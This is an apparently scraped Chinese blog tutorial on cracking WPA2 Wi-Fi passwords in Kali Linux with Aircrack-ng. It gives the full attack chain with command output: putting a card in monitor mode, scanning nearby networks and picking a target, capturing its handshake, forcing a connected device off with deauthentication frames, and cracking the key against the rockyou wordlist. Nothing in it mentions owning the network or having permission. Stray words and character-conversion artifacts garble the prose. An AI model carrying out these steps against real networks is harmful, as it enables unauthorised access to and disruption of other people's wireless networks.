Kali 使用Aircrack-ng破解簡單wifi密碼

硬件使用支持Monitor的USB無線網卡。Kali能夠使用虛擬機,官網有直接能夠下載打開的虛擬機鏡像,即開即用。less

  正常狀況下使用ifconfig 就能夠看到識別到的網卡wlan0了。spa

使用iwconfig命令能夠查看當前的網卡信息。.net

進入monitor模式:airmon-ng start wlan0xml

運行iwconfig能夠看到網卡進入了monitor模式:ip

root@kali:~# iwconfig路由

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
eth0      no wireless extensions.

lo        no wireless extensions.

 使用airodump-ng wlan0mon命令查看當前網卡所檢測到的無線信息。運行這個命令後選擇一個路由進行破解,記住其的BSSID與CH信息。虛擬機

 CH  9 ][ Elapsed: 1 min ][ 2017-12-08 01:32                                         
                                                                                                      
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                      
 44:D1:FA:08:B9:60  -10       27        3    0  13  54e  WPA2 CCMP   PSK  Wireless 2.4G_08B960        
 80:89:17:7F:90:E2  -15       24       12    0   1  54e. WPA2 CCMP   PSK  yyyy                        
 00:0C:43:10:4E:15  -18       30        0    0   9  54e. WPA2 CCMP   PSK  w-AP                        
 EC:3D:FD:C9:86:6A  -20       27        8    0   3  54e  WPA2 CCMP   PSK  <length:  0>                
 B8:3A:08:62:10:F9  -23       20        0    0   6  54e  WPA2 CCMP   PSK  NOVA_10E8                   
 B0:D5:9D:20:BB:05  -26       10        0    0   1  54e. WPA2 CCMP   PSK  ss                          
 B8:3A:08:62:10:E9  -28       20        0    0   6  54e  WPA2 CCMP   PSK  NOVA_10E8                   
 94:8B:03:FE:01:C0  -28       20        0    0   7  54e  OPN              CYWiFi-01C0                 
 96:8B:03:FA:01:C0  -28       27        0    0   7  54e  OPN               �..費��.�.��.�享WiFi       
 78:A3:51:32:3B:BC  -29       25        0    0  13  54e  OPN              2.4000000000000000000        
 00:AA:BB:59:00:13  -29       22        0    0   7  54e. OPN              000-p59-0013                
 78:D3:8D:F7:E8:95  -29       24        0    0   6  54e. WPA2 CCMP   PSK  Tozed-test1                 
 D8:D8:66:03:E4:6E  -32       10        0    0  11  54e. OPN              Tozed-2.4G                   
 D8:D8:66:03:E4:7A  -33        6        0    0  11  54e. OPN              Tozed-2.4G                  
 00:03:7F:33:27:4F  -34       60        0    0   8  54e. WPA2 CCMP   PSK  tozed-33274F                 
 00:E0:4C:14:0F:DE  -36       14        0    0   6  54e  WPA2 CCMP   PSK  FWT_140FDE                  
 34:96:72:43:8E:CE  -37       22        0    0  11  54e. WPA2 CCMP   PSK  TP-LINK_8ECE  

 其中亂碼的是中文SSID。it

使用命令對指定的SSID進行抓包:io

airodump-ng wlan0mon --bssid 00:0C:43:10:4E:15 -c 9 -w ap4e15test

其中--bssid 爲指定bssid,-c 指定信道。-w 指定抓取後生成的文件,這個文件會以ap4e15開頭。

CH  9 ][ Elapsed: 36 s ][ 2017-12-08 01:41 ][ WPA handshake: 00:0C:43:10:4E:15                       
                                                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                      
 00:0C:43:10:4E:15  -15   0      367      560    4   9  54e. WPA2 CCMP   PSK  w-AP                    
                                                                                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                            
                                                                                                      
 00:0C:43:10:4E:15  F8:23:B2:A2:B1:0C  -25    0e-24e   975      691  
能夠看到有一臺 F8:23:B2:A2:B1:0C 。設備鏈接到了該ap

 保持以上的命令運行,新開一個終端運行命令使其從新創建鏈接,這樣咱們就能抓取到四步握手的信息了。

root@kali:~# aireplay-ng -0 2 -a 00:0C:43:10:4E:15 -c F8:23:B2:A2:B1:0C wlan0mon

01:46:41  Waiting for beacon frame (BSSID: 00:0C:43:10:4E:15) on channel 9
01:46:42  Sending 64 directed DeAuth. STMAC: [F8:23:B2:A2:B1:0C] [61|62 ACKs]
01:46:42  Sending 64 directed DeAuth. STMAC: [F8:23:B2:A2:B1:0C] [59|60 ACKs]

這個時候該設備應該會從新鏈接了。能夠取消抓包。

 

root@kali:~# ls ap4e15*

ap4e15-01.cap  ap4e15-01.kismet.csv     ap4e15-02.cap  ap4e15-02.kismet.csv
ap4e15-01.csv  ap4e15-01.kismet.netxml  ap4e15-02.csv  ap4e15-02.kismet.netxml

以上的名字,是抓包時候-w參數後設置的。這幾種不一樣的格式,若是須要分析則能夠使用.cap的文件,用wireshark能夠打開分析。

 

而後使用Kali的默認字典進行破解,目錄在/usr/share/wordlists/rockyou.txt.gz,進入該目錄,使用gunzip rockyou.txt.gz解壓。其它字典位置能夠本身去研究。

aircrack-ng -w /usr/share/wordlists/rockyou.txt ap4e15-01.cap

可能破解會成功 也會失敗,簡單的就很容易了 複雜的 ,字典包裏面沒有那就不行了。

相關文章
相關標籤/搜索